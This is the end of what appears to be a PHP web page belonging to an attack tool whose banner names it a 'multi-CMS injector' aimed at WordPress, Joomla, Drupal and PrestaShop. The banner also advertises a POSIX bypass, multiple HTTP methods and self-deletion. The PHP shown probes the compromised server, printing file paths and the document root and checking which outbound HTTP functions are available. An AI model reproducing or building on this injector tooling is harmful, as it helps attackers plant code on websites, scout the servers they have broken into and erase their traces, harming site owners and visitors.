                echo "  • __FILE__: " . __FILE__ . "\n";
                echo "  • DOCUMENT_ROOT: " . ($_SERVER['DOCUMENT_ROOT'] ?? 'N/A') . "\n";
                echo "  • SCRIPT_FILENAME: " . ($_SERVER['SCRIPT_FILENAME'] ?? 'N/A') . "\n";
                
                echo "\n🌐 HTTP REQUEST CAPABILITIES:\n";
                $http_methods = [];
                if (function_exists('curl_init')) $http_methods[] = 'cURL';
                if (ini_get('allow_url_fopen')) $http_methods[] = 'file_get_contents';
                if (function_exists('fopen')) $http_methods[] = 'fopen';
                if (function_exists('fsockopen')) $http_methods[] = 'fsockopen';
                
                if (!empty($http_methods)) {
                    echo "  ✅ Available: " . implode(', ', $http_methods) . "\n";
                } else {
                    echo "  ❌ No HTTP methods available\n";
                }
                ?>
            </div>
        </div>
    </div>

    <script>
        console.log(`
        ╔══════════════════════════════════════════════════════════════╗
        ║         FRIDA'S TESLA MULTI-CMS INJECTOR LOADED              ║
        ║    WordPress|Image-Functions|Joomla|Drupal|PrestaShop       ║
        ║         POSIX Bypass + Multi-Method HTTP + Self-Delete       ║
        ╚══════════════════════════════════════════════════════════════╝
        `);
    </script>
</body>
</html>
